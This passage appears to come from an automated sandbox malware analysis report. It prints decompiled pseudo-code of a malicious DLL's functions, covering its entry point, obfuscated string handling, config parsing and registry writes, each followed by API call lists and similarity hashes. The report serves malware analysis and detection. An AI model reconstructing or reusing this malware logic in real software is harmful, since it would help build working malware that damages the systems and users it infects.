                                                                                                                          				CHAR* _v16;
                                                                                                                          				long _v20;
                                                                                                                          				void* __edi;
                                                                                                                          				void* __esi;
                                                                                                                          				void* _t21;
                                                                                                                          				CHAR* _t22;
                                                                                                                          				CHAR* _t25;
                                                                                                                          				intOrPtr _t26;
                                                                                                                          				void* _t27;
                                                                                                                          				void* _t31;
                                                                                                                          				void* _t32;
                                                                                                                          				CHAR* _t36;
                                                                                                                          				CHAR* _t42;
                                                                                                                          				CHAR* _t43;
                                                                                                                          				CHAR* _t44;
                                                                                                                          				void* _t49;
                                                                                                                          				void* _t51;
                                                                                                                          				CHAR* _t54;
                                                                                                                          				signed char _t56;
                                                                                                                          				intOrPtr _t58;
                                                                                                                          				signed int _t59;
                                                                                                                          				void* _t62;
                                                                                                                          				CHAR* _t65;
                                                                                                                          				CHAR* _t66;
                                                                                                                          				char* _t67;
                                                                                                                          				void* _t68;
                                                                                                                          
                                                                                                                          				_t61 = __edx;
                                                                                                                          				_v20 = 0;
                                                                                                                          				_v8 = 0;
                                                                                                                          				_v12 = 0;
                                                                                                                          				_t21 = E0497154A();
                                                                                                                          				if(_t21 != 0) {
                                                                                                                          					_t59 =  *0x497d294; // 0x4000000a
                                                                                                                          					_t55 = (_t59 & 0xf0000000) + _t21;
                                                                                                                          					 *0x497d294 = (_t59 & 0xf0000000) + _t21;
                                                                                                                          				}
                                                                                                                          				_t22 =  *0x497d12c(0, 2); // executed
                                                                                                                          				_v16 = _t22;
                                                                                                                          				if(_t22 == 0 || _t22 == 1 || _t22 == 0x80010106) {
                                                                                                                          					_t25 = E049721DE( &_v8,  &_v20); // executed
                                                                                                                          					_t54 = _t25;
                                                                                                                          					_t26 =  *0x497d2e0; // 0x267a5a8
                                                                                                                          					if( *0x497d294 > 5) {
                                                                                                                          						_t8 = _t26 + 0x497e5cd; // 0x4d283a53
                                                                                                                          						_t27 = _t8;
                                                                                                                          					} else {
                                                                                                                          						_t7 = _t26 + 0x497e9f9; // 0x44283a44
                                                                                                                          						_t27 = _t7;
                                                                                                                          					}
                                                                                                                          					E049711F4(_t27, _t27);
                                                                                                                          					_t31 = E04973598(_t61,  &_v20,  &_v12); // executed
                                                                                                                          					if(_t31 == 0) {
                                                                                                                          						CloseHandle(_v20);
                                                                                                                          					}
                                                                                                                          					_t62 = 5;
                                                                                                                          					if(_t54 != _t62) {
                                                                                                                          						 *0x497d2a8 =  *0x497d2a8 ^ 0x81bbe65d;
                                                                                                                          						_t32 = E049775F6(0x60);
                                                                                                                          						 *0x497d364 = _t32;
                                                                                                                          						__eflags = _t32;
                                                                                                                          						if(_t32 == 0) {
                                                                                                                          							_push(8);
                                                                                                                          							_pop(0);
                                                                                                                          						} else {
                                                                                                                          							memset(_t32, 0, 0x60);
                                                                                                                          							_t49 =  *0x497d364; // 0x6ff95b0
                                                                                                                          							_t68 = _t68 + 0xc;
                                                                                                                          							__imp__(_t49 + 0x40);
                                                                                                                          							_t51 =  *0x497d364; // 0x6ff95b0
                                                                                                                          							 *_t51 = 0x497e823;
                                                                                                                          						}
                                                                                                                          						_t54 = 0;
                                                                                                                          						__eflags = 0;
                                                                                                                          						if(0 == 0) {
                                                                                                                          							_t36 = RtlAllocateHeap( *0x497d270, 0, 0x43);
                                                                                                                          							 *0x497d300 = _t36;
                                                                                                                          							__eflags = _t36;
                                                                                                                          							if(_t36 == 0) {
                                                                                                                          								_push(8);
                                                                                                                          								_pop(0);
                                                                                                                          							} else {
                                                                                                                          								_t56 =  *0x497d294; // 0x4000000a
                                                                                                                          								_t61 = _t56 & 0x000000ff;
                                                                                                                          								_t58 =  *0x497d2e0; // 0x267a5a8
                                                                                                                          								_t13 = _t58 + 0x497e55a; // 0x697a6f4d
                                                                                                                          								_t55 = _t13;
                                                                                                                          								wsprintfA(_t36, _t13, _t56 & 0x000000ff, _t56 & 0x000000ff, 0x497c2a7);
                                                                                                                          							}
                                                                                                                          							_t54 = 0;
                                                                                                                          							__eflags = 0;
                                                                                                                          							if(0 == 0) {
                                                                                                                          								asm("sbb eax, eax");
                                                                                                                          								E0497A82B( ~_v8 &  *0x497d2a8, 0x497d00c); // executed
                                                                                                                          								_t42 = E04974C40(_t55); // executed
                                                                                                                          								_t54 = _t42;
                                                                                                                          								__eflags = _t54;
                                                                                                                          								if(_t54 != 0) {
                                                                                                                          									goto L30;
                                                                                                                          								}
                                                                                                                          								_t43 = E049774A5(); // executed
                                                                                                                          								__eflags = _t43;
                                                                                                                          								if(_t43 != 0) {
                                                                                                                          									__eflags = _v8;
                                                                                                                          									_t65 = _v12;
                                                                                                                          									if(_v8 != 0) {
                                                                                                                          										L29:
                                                                                                                          										_t44 = E04975461(_t61, _t65, _v8); // executed
                                                                                                                          										_t54 = _t44;
                                                                                                                          										goto L30;
                                                                                                                          									}
                                                                                                                          									__eflags = _t65;
                                                                                                                          									if(__eflags == 0) {
                                                                                                                          										goto L30;
                                                                                                                          									}
                                                                                                                          									_t54 = E04973FC2(__eflags,  &(_t65[4]));
                                                                                                                          									__eflags = _t54;
                                                                                                                          									if(_t54 == 0) {
                                                                                                                          										goto L30;
                                                                                                                          									}
                                                                                                                          									goto L29;
                                                                                                                          								}
                                                                                                                          								_t54 = 8;
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          					} else {
                                                                                                                          						_t66 = _v12;
                                                                                                                          						if(_t66 == 0) {
                                                                                                                          							L30:
                                                                                                                          							if(_v16 == 0 || _v16 == 1) {
                                                                                                                          								 *0x497d128();
                                                                                                                          							}
                                                                                                                          							goto L34;
                                                                                                                          						}
                                                                                                                          						_t67 =  &(_t66[4]);
                                                                                                                          						do {
                                                                                                                          						} while (E04975AB2(_t62, _t67, 0, 1) == 0x4c7);
                                                                                                                          					}
                                                                                                                          					goto L30;
                                                                                                                          				} else {
                                                                                                                          					_t54 = _t22;
                                                                                                                          					L34:
                                                                                                                          					return _t54;
                                                                                                                          				}
                                                                                                                          			}

                                                                                                                          APIs
                                                                                                                            • Part of subcall function 0497154A: GetModuleHandleA.KERNEL32(4C44544E,00000000,04975226,00000000,00000000), ref: 04971559
                                                                                                                          • CloseHandle.KERNEL32(?,?,?,4D283A53,?,?), ref: 049752A3
                                                                                                                            • Part of subcall function 049775F6: RtlAllocateHeap.NTDLL(00000000,00000000,04974F70), ref: 04977602
                                                                                                                          • memset.NTDLL ref: 049752F2
                                                                                                                          • RtlInitializeCriticalSection.NTDLL(06FF9570), ref: 04975303
                                                                                                                            • Part of subcall function 04973FC2: memset.NTDLL ref: 04973FD7
                                                                                                                            • Part of subcall function 04973FC2: lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 04974019
                                                                                                                            • Part of subcall function 04973FC2: StrCmpNIW.SHLWAPI(00000000,00000000,00000000), ref: 04974024
                                                                                                                          • RtlAllocateHeap.NTDLL(00000000,00000043,00000060), ref: 0497532E
                                                                                                                          • wsprintfA.USER32 ref: 0497535E
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.942731260.0000000004971000.00000020.00020000.sdmp, Offset: 04970000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.942716356.0000000004970000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.942751568.000000000497C000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.942765529.000000000497D000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.942780831.000000000497F000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: AllocateHandleHeapmemset$CloseCriticalInitializeModuleSectionlstrlenwsprintf
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 4246211962-0
                                                                                                                          • Opcode ID: 85b8e9346e93e8e7a8d27d2027958bb4b8d8284cc5749c02840402b33249259c
                                                                                                                          • Instruction ID: febed2c5b663c2781b7c7a9eddc9b4d70222da412cd96a437d1b6a31738835be
                                                                                                                          • Opcode Fuzzy Hash: 85b8e9346e93e8e7a8d27d2027958bb4b8d8284cc5749c02840402b33249259c
                                                                                                                          • Instruction Fuzzy Hash: 0F510471B04314FBEB60ABA0DC89B6E7BACEF04724F450575E601E7590E7B8BD458B90
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 22%
                                                                                                                          			E049778E6(signed int __eax, signed int _a4, signed int _a8) {
                                                                                                                          				signed int _v8;
                                                                                                                          				signed int _v12;
                                                                                                                          				intOrPtr _v16;
                                                                                                                          				signed int _v20;
                                                                                                                          				intOrPtr _t81;
                                                                                                                          				char _t83;
                                                                                                                          				signed int _t90;
                                                                                                                          				signed int _t97;
                                                                                                                          				signed int _t99;
                                                                                                                          				char _t101;
                                                                                                                          				unsigned int _t102;
                                                                                                                          				intOrPtr _t103;
                                                                                                                          				char* _t107;
                                                                                                                          				signed int _t110;
                                                                                                                          				signed int _t113;
                                                                                                                          				signed int _t118;
                                                                                                                          				signed int _t122;
                                                                                                                          				intOrPtr _t124;
                                                                                                                          
                                                                                                                          				_t102 = _a8;
                                                                                                                          				_t118 = 0;
                                                                                                                          				_v20 = __eax;
                                                                                                                          				_t122 = (_t102 >> 2) + 1;
                                                                                                                          				_v8 = 0;
                                                                                                                          				_a8 = 0;
                                                                                                                          				_t81 = E049775F6(_t122 << 2);
                                                                                                                          				_v16 = _t81;
                                                                                                                          				if(_t81 == 0) {
                                                                                                                          					_push(8);
                                                                                                                          					_pop(0);
                                                                                                                          					L37:
                                                                                                                          					return 0;
                                                                                                                          				}
                                                                                                                          				_t107 = _a4;
                                                                                                                          				_a4 = _t102;
                                                                                                                          				_t113 = 0;
                                                                                                                          				while(1) {
                                                                                                                          					_t83 =  *_t107;
                                                                                                                          					if(_t83 == 0) {
                                                                                                                          						break;
                                                                                                                          					}
                                                                                                                          					if(_t83 == 0xd || _t83 == 0xa) {
                                                                                                                          						if(_t118 != 0) {
                                                                                                                          							if(_t118 > _v8) {
                                                                                                                          								_v8 = _t118;
                                                                                                                          							}
                                                                                                                          							_a8 = _a8 + 1;
                                                                                                                          							_t118 = 0;
                                                                                                                          						}
                                                                                                                          						 *_t107 = 0;
                                                                                                                          						goto L16;
                                                                                                                          					} else {
                                                                                                                          						if(_t118 != 0) {
                                                                                                                          							L10:
                                                                                                                          							_t118 = _t118 + 1;
                                                                                                                          							L16:
                                                                                                                          							_t107 = _t107 + 1;
                                                                                                                          							_t15 =  &_a4;
                                                                                                                          							 *_t15 = _a4 - 1;
                                                                                                                          							if( *_t15 != 0) {
                                                                                                                          								continue;
                                                                                                                          							}
                                                                                                                          							break;
                                                                                                                          						}
                                                                                                                          						if(_t113 == _t122) {
                                                                                                                          							L21:
                                                                                                                          							if(_a8 <= 0x20) {
                                                                                                                          								_push(0xb);
                                                                                                                          								L34:
                                                                                                                          								_pop(0);
                                                                                                                          								L35:
                                                                                                                          								E04974AAB(_v16);
                                                                                                                          								goto L37;
                                                                                                                          							}
                                                                                                                          							_t24 = _v8 + 5; // 0xcdd8d2f8
                                                                                                                          							_t103 = E049775F6((_v8 + _t24) * _a8 + 4);
                                                                                                                          							if(_t103 == 0) {
                                                                                                                          								_push(8);
                                                                                                                          								goto L34;
                                                                                                                          							}
                                                                                                                          							_t90 = _a8;
                                                                                                                          							_a4 = _a4 & 0x00000000;
                                                                                                                          							_v8 = _v8 & 0x00000000;
                                                                                                                          							_t124 = _t103 + _t90 * 4;
                                                                                                                          							if(_t90 <= 0) {
                                                                                                                          								L31:
                                                                                                                          								 *0x497d2b0 = _t103;
                                                                                                                          								goto L35;
                                                                                                                          							}
                                                                                                                          							do {
                                                                                                                          								_t110 = 0x3c6ef35f + _v20 * 0x19660d;
                                                                                                                          								_v20 = 0x3c6ef35f + _t110 * 0x19660d;
                                                                                                                          								__imp__(_t124,  *((intOrPtr*)(_v16 + _t110 % _a8 * 4)));
                                                                                                                          								__imp__(_t124,  *((intOrPtr*)(_v16 + _v20 % _a8 * 4)));
                                                                                                                          								_v12 = _v12 & 0x00000000;
                                                                                                                          								if(_a4 <= 0) {
                                                                                                                          									goto L30;
                                                                                                                          								} else {
                                                                                                                          									goto L26;
                                                                                                                          								}
                                                                                                                          								while(1) {
                                                                                                                          									L26:
                                                                                                                          									_t99 = _v12;
                                                                                                                          									__imp__( *((intOrPtr*)(_t103 + _t99 * 4)), _t124); // executed
                                                                                                                          									if(_t99 == 0) {
                                                                                                                          										break;
                                                                                                                          									}
                                                                                                                          									_v12 = _v12 + 1;
                                                                                                                          									if(_v12 < _a4) {
                                                                                                                          										continue;
                                                                                                                          									}
                                                                                                                          									goto L30;
                                                                                                                          								}
                                                                                                                          								_v8 = _v8 - 1;
                                                                                                                          								L30:
                                                                                                                          								_t97 = _a4;
                                                                                                                          								_a4 = _a4 + 1;
                                                                                                                          								 *((intOrPtr*)(_t103 + _t97 * 4)) = _t124;
                                                                                                                          								__imp__(_t124);
                                                                                                                          								_v8 = _v8 + 1;
                                                                                                                          								_t124 = _t124 + _t97 + 1;
                                                                                                                          							} while (_v8 < _a8);
                                                                                                                          							goto L31;
                                                                                                                          						}
                                                                                                                          						 *((intOrPtr*)(_v16 + _t113 * 4)) = _t107;
                                                                                                                          						_t101 = _t83;
                                                                                                                          						if(_t83 - 0x61 <= 0x19) {
                                                                                                                          							_t101 = _t101 - 0x20;
                                                                                                                          						}
                                                                                                                          						 *_t107 = _t101;
                                                                                                                          						_t113 = _t113 + 1;
                                                                                                                          						goto L10;
                                                                                                                          					}
                                                                                                                          				}
                                                                                                                          				if(_t118 != 0) {
                                                                                                                          					if(_t118 > _v8) {
                                                                                                                          						_v8 = _t118;
                                                                                                                          					}
                                                                                                                          					_a8 = _a8 + 1;
                                                                                                                          				}
                                                                                                                          				goto L21;
                                                                                                                          			}





















                                                                                                                          0x0497794f
                                                                                                                          0x00000000
                                                                                                                          0x0497794f
                                                                                                                          0x04977929
                                                                                                                          0x0497796f
                                                                                                                          0x04977974
                                                                                                                          0x04977976
                                                                                                                          0x04977976
                                                                                                                          0x04977979
                                                                                                                          0x04977979
                                                                                                                          0x00000000

                                                                                                                          APIs
                                                                                                                            • Part of subcall function 049775F6: RtlAllocateHeap.NTDLL(00000000,00000000,04974F70), ref: 04977602
                                                                                                                          • lstrcpy.KERNEL32(69B25F45,00000020), ref: 049779E3
                                                                                                                          • lstrcat.KERNEL32(69B25F45,00000020), ref: 049779F8
                                                                                                                          • lstrcmp.KERNEL32(00000000,69B25F45), ref: 04977A0F
                                                                                                                          • lstrlen.KERNEL32(69B25F45), ref: 04977A33
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.942731260.0000000004971000.00000020.00020000.sdmp, Offset: 04970000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.942716356.0000000004970000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.942751568.000000000497C000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.942765529.000000000497D000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.942780831.000000000497F000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: AllocateHeaplstrcatlstrcmplstrcpylstrlen
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3214092121-3916222277
                                                                                                                          • Opcode ID: 7a7e12bd26acc639178d845b200e5c228ae2d4a589a5f3cfb40dc6c1b8a250f4
                                                                                                                          • Instruction ID: 2df4f1974f7a2ce5498ebc96c21b4e03c26448f4dbf7d1b9e8a018cf4adccacd
                                                                                                                          • Opcode Fuzzy Hash: 7a7e12bd26acc639178d845b200e5c228ae2d4a589a5f3cfb40dc6c1b8a250f4
                                                                                                                          • Instruction Fuzzy Hash: 2151A135A01219EBDF15CFD9C544AADBBBAFF85354F0480BAE815AB202D770BB51CB80
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 50%
                                                                                                                          			E04979311(void** __esi) {
                                                                                                                          				intOrPtr _v0;
                                                                                                                          				intOrPtr _t4;
                                                                                                                          				intOrPtr _t6;
                                                                                                                          				void* _t8;
                                                                                                                          				void* _t9;
                                                                                                                          				intOrPtr _t10;
                                                                                                                          				void* _t11;
                                                                                                                          				void** _t13;
                                                                                                                          
                                                                                                                          				_t13 = __esi;
                                                                                                                          				_t4 =  *0x497d364; // 0x6ff95b0
                                                                                                                          				__imp__(_t4 + 0x40);
                                                                                                                          				while(1) {
                                                                                                                          					_t6 =  *0x497d364; // 0x6ff95b0
                                                                                                                          					_t1 = _t6 + 0x58; // 0x0
                                                                                                                          					if( *_t1 == 0) {
                                                                                                                          						break;
                                                                                                                          					}
                                                                                                                          					Sleep(0xa);
                                                                                                                          				}
                                                                                                                          				_t8 =  *_t13;
                                                                                                                          				if(_t8 != 0 && _t8 != 0x497d030) {
                                                                                                                          					HeapFree( *0x497d270, 0, _t8);
                                                                                                                          				}
                                                                                                                          				_t9 = E04975141(_v0, _t13); // executed
                                                                                                                          				_t13[1] = _t9;
                                                                                                                          				_t10 =  *0x497d364; // 0x6ff95b0
                                                                                                                          				_t11 = _t10 + 0x40;
                                                                                                                          				__imp__(_t11);
                                                                                                                          				return _t11;
                                                                                                                          			}












                                                                                                                          APIs
                                                                                                                          • RtlEnterCriticalSection.NTDLL(06FF9570), ref: 0497931A
                                                                                                                          • Sleep.KERNEL32(0000000A,?,04975390), ref: 04979324
                                                                                                                          • HeapFree.KERNEL32(00000000,00000000,?,04975390), ref: 0497934C
                                                                                                                          • RtlLeaveCriticalSection.NTDLL(06FF9570), ref: 04979368
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.942731260.0000000004971000.00000020.00020000.sdmp, Offset: 04970000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.942716356.0000000004970000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.942751568.000000000497C000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.942765529.000000000497D000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.942780831.000000000497F000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 58946197-0
                                                                                                                          • Opcode ID: 06ade767c23cd013921cf62eac7fe35ecb2d974b4825c758e2cd5bac31fa884c
                                                                                                                          • Instruction ID: 68c336b4097143f588400ed141a3c1b55b565a18e1f126d27bdbda6a65c444df
                                                                                                                          • Opcode Fuzzy Hash: 06ade767c23cd013921cf62eac7fe35ecb2d974b4825c758e2cd5bac31fa884c
                                                                                                                          • Instruction Fuzzy Hash: 85F0F8B1609240EBFB289F68ED48F1A3FE8FF15385B044538F652E72A0D628EC40CB55
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 47%
                                                                                                                          			E04975141(char* _a4, char** _a8) {
                                                                                                                          				char* _t7;
                                                                                                                          				char* _t11;
                                                                                                                          				char* _t14;
                                                                                                                          				char* _t16;
                                                                                                                          				char* _t17;
                                                                                                                          				char _t18;
                                                                                                                          				signed int _t20;
                                                                                                                          				signed int _t22;
                                                                                                                          
                                                                                                                          				_t16 = _a4;
                                                                                                                          				_push(0x20);
                                                                                                                          				_t20 = 1;
                                                                                                                          				_push(_t16);
                                                                                                                          				while(1) {
                                                                                                                          					_t7 = StrChrA();
                                                                                                                          					if(_t7 == 0) {
                                                                                                                          						break;
                                                                                                                          					}
                                                                                                                          					_t20 = _t20 + 1;
                                                                                                                          					_push(0x20);
                                                                                                                          					_push( &(_t7[1]));
                                                                                                                          				}
                                                                                                                          				_t11 = E049775F6(_t20 << 2);
                                                                                                                          				_a4 = _t11;
                                                                                                                          				if(_t11 != 0) {
                                                                                                                          					StrTrimA(_t16, 0x497c2a4); // executed
                                                                                                                          					_t22 = 0;
                                                                                                                          					do {
                                                                                                                          						_t14 = StrChrA(_t16, 0x20);
                                                                                                                          						if(_t14 != 0) {
                                                                                                                          							 *_t14 = 0;
                                                                                                                          							do {
                                                                                                                          								_t14 =  &(_t14[1]);
                                                                                                                          								_t18 =  *_t14;
                                                                                                                          							} while (_t18 == 0x20 || _t18 == 9);
                                                                                                                          						}
                                                                                                                          						_t17 = _a4;
                                                                                                                          						 *(_t17 + _t22 * 4) = _t16;
                                                                                                                          						_t22 = _t22 + 1;
                                                                                                                          						_t16 = _t14;
                                                                                                                          					} while (_t14 != 0);
                                                                                                                          					 *_a8 = _t17;
                                                                                                                          				}
                                                                                                                          				return 0;
                                                                                                                          			}












                                                                                                                          APIs
                                                                                                                          • StrChrA.SHLWAPI(?,00000020,00000000,06FF95AC,04975390,?,0497935C,?,06FF95AC,?,04975390), ref: 0497515D
                                                                                                                          • StrTrimA.KERNELBASE(?,0497C2A4,00000002,?,0497935C,?,06FF95AC,?,04975390), ref: 0497517B
                                                                                                                          • StrChrA.SHLWAPI(?,00000020,?,0497935C,?,06FF95AC,?,04975390), ref: 04975186
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.942731260.0000000004971000.00000020.00020000.sdmp, Offset: 04970000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.942716356.0000000004970000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.942751568.000000000497C000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.942765529.000000000497D000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.942780831.000000000497F000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: Trim
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3043112668-0
                                                                                                                          • Opcode ID: 028efadb254290d8713cc0ab4c08e7ee076b614c04c76620a623f7b4aea4226f
                                                                                                                          • Instruction ID: 12f7688d358a66dfaf0fcb8bd8c0b62fd4a54d2694fa6d32bc84e8cee8f4de71
                                                                                                                          • Opcode Fuzzy Hash: 028efadb254290d8713cc0ab4c08e7ee076b614c04c76620a623f7b4aea4226f
                                                                                                                          • Instruction Fuzzy Hash: 2101B1713043467FE7604A6A8C44F677B9EEFC53A9F051031BA55CB642E670F802C760
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			_entry_(intOrPtr _a4, intOrPtr _a8) {
                                                                                                                          				intOrPtr _t4;
                                                                                                                          				void* _t10;
                                                                                                                          				void* _t11;
                                                                                                                          				void* _t12;
                                                                                                                          				void* _t14;
                                                                                                                          
                                                                                                                          				_t14 = 1;
                                                                                                                          				_t4 = _a8;
                                                                                                                          				if(_t4 == 0) {
                                                                                                                          					if(InterlockedDecrement(0x497d274) == 0) {
                                                                                                                          						E04974450();
                                                                                                                          					}
                                                                                                                          				} else {
                                                                                                                          					if(_t4 == 1 && InterlockedIncrement(0x497d274) == 1) {
                                                                                                                          						_t10 = E0497262F(_t11, _t12, _a4); // executed
                                                                                                                          						if(_t10 != 0) {
                                                                                                                          							_t14 = 0;
                                                                                                                          						}
                                                                                                                          					}
                                                                                                                          				}
                                                                                                                          				return _t14;
                                                                                                                          			}








                                                                                                                          APIs
                                                                                                                          • InterlockedIncrement.KERNEL32(0497D274), ref: 049718ED
                                                                                                                            • Part of subcall function 0497262F: HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001,?,?,?,04971900,?), ref: 04972642
                                                                                                                          • InterlockedDecrement.KERNEL32(0497D274), ref: 0497190D
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.942731260.0000000004971000.00000020.00020000.sdmp, Offset: 04970000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.942716356.0000000004970000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.942751568.000000000497C000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.942765529.000000000497D000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.942780831.000000000497F000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: Interlocked$CreateDecrementHeapIncrement
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3834848776-0
                                                                                                                          • Opcode ID: 0295d2884f8333e75c15249ae9d7ee1b6f729c2338187d0973fab522e28030cf
                                                                                                                          • Instruction ID: 0ecc955fc60e0bf427203ec9cb62c1b4cf352be1185f7f7672d5bcc9ecf043d8
                                                                                                                          • Opcode Fuzzy Hash: 0295d2884f8333e75c15249ae9d7ee1b6f729c2338187d0973fab522e28030cf
                                                                                                                          • Instruction Fuzzy Hash: BDE0DF39354122979F352A60A80A71BEA48AF80784F004630E580C112FD220E883A7D1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 87%
                                                                                                                          			E0497502E(void* __edx) {
                                                                                                                          				char _v8;
                                                                                                                          				char _v12;
                                                                                                                          				void* _v16;
                                                                                                                          				void* __edi;
                                                                                                                          				void* __esi;
                                                                                                                          				void* _t23;
                                                                                                                          				intOrPtr _t24;
                                                                                                                          				intOrPtr _t32;
                                                                                                                          				intOrPtr _t35;
                                                                                                                          				intOrPtr _t38;
                                                                                                                          				intOrPtr _t42;
                                                                                                                          				void* _t45;
                                                                                                                          				void* _t50;
                                                                                                                          				void* _t52;
                                                                                                                          
                                                                                                                          				_t50 = __edx;
                                                                                                                          				_v12 = 0;
                                                                                                                          				_t23 = E049737AC(0,  &_v8); // executed
                                                                                                                          				if(_t23 != 0) {
                                                                                                                          					_v8 = 0;
                                                                                                                          				}
                                                                                                                          				_t24 =  *0x497d2e0; // 0x267a5a8
                                                                                                                          				_t4 = _t24 + 0x497edc8; // 0x6ff9370
                                                                                                                          				_t5 = _t24 + 0x497ed70; // 0x4f0053
                                                                                                                          				_t45 = E04974B28( &_v16, _v8, _t5, _t4);
                                                                                                                          				if(_t45 == 0) {
                                                                                                                          					 *0x497d104(_v16, 0,  &_v12);
                                                                                                                          					_t45 = 8;
                                                                                                                          					if(_v12 < _t45) {
                                                                                                                          						_t45 = 1;
                                                                                                                          						__eflags = 1;
                                                                                                                          					} else {
                                                                                                                          						_t32 =  *0x497d2e0; // 0x267a5a8
                                                                                                                          						_t11 = _t32 + 0x497edbc; // 0x6ff9364
                                                                                                                          						_t48 = _t11;
                                                                                                                          						_t12 = _t32 + 0x497ed70; // 0x4f0053
                                                                                                                          						_t52 = E0497131E(_t11, _t12, _t11);
                                                                                                                          						_t59 = _t52;
                                                                                                                          						if(_t52 != 0) {
                                                                                                                          							_t35 =  *0x497d2e0; // 0x267a5a8
                                                                                                                          							_t13 = _t35 + 0x497ee06; // 0x30314549
                                                                                                                          							if(E0497117A(_t48, _t50, _t59, _v8, _t52, _t13, 0x14) == 0) {
                                                                                                                          								_t61 =  *0x497d294 - 6;
                                                                                                                          								if( *0x497d294 <= 6) {
                                                                                                                          									_t42 =  *0x497d2e0; // 0x267a5a8
                                                                                                                          									_t15 = _t42 + 0x497ec12; // 0x52384549
                                                                                                                          									E0497117A(_t48, _t50, _t61, _v8, _t52, _t15, 0x13);
                                                                                                                          								}
                                                                                                                          							}
                                                                                                                          							_t38 =  *0x497d2e0; // 0x267a5a8
                                                                                                                          							_t17 = _t38 + 0x497ee00; // 0x6ff93a8
                                                                                                                          							_t18 = _t38 + 0x497edd8; // 0x680043
                                                                                                                          							_t45 = E04975DDA(_v8, 0x80000001, _t52, _t18, _t17);
                                                                                                                          							HeapFree( *0x497d270, 0, _t52);
                                                                                                                          						}
                                                                                                                          					}
                                                                                                                          					HeapFree( *0x497d270, 0, _v16);
                                                                                                                          				}
                                                                                                                          				_t54 = _v8;
                                                                                                                          				if(_v8 != 0) {
                                                                                                                          					E049751BB(_t54);
                                                                                                                          				}
                                                                                                                          				return _t45;
                                                                                                                          			}

















                                                                                                                          APIs
                                                                                                                          • HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,06FF93A8,?,00000000,30314549,00000014,004F0053,06FF9364), ref: 0497511A
                                                                                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,049754EF), ref: 0497512C
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.942731260.0000000004971000.00000020.00020000.sdmp, Offset: 04970000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.942716356.0000000004970000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.942751568.000000000497C000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.942765529.000000000497D000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.942780831.000000000497F000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: FreeHeap
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3298025750-0
                                                                                                                          • Opcode ID: 8788c14a7070e4c048270eefddb980d4edfca85a6626f17e3467ce0a389416ee
                                                                                                                          • Instruction ID: 936109172305f8bf352fef1001b04880648eb00f7c73bc88e2a08ede252c988d
                                                                                                                          • Opcode Fuzzy Hash: 8788c14a7070e4c048270eefddb980d4edfca85a6626f17e3467ce0a389416ee
                                                                                                                          • Instruction Fuzzy Hash: 67318F71A00108BFEB21DB94DD88EAA7BBCFF84B58F1541B9E600AB150D671EE05DB90
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Non-executed Functions

                                                                                                                          C-Code - Quality: 96%
                                                                                                                          			E04974C40(int* __ecx) {
                                                                                                                          				int _v8;
                                                                                                                          				void* _v12;
                                                                                                                          				void* _v16;
                                                                                                                          				void* __esi;
                                                                                                                          				signed int _t28;
                                                                                                                          				signed int _t33;
                                                                                                                          				signed int _t39;
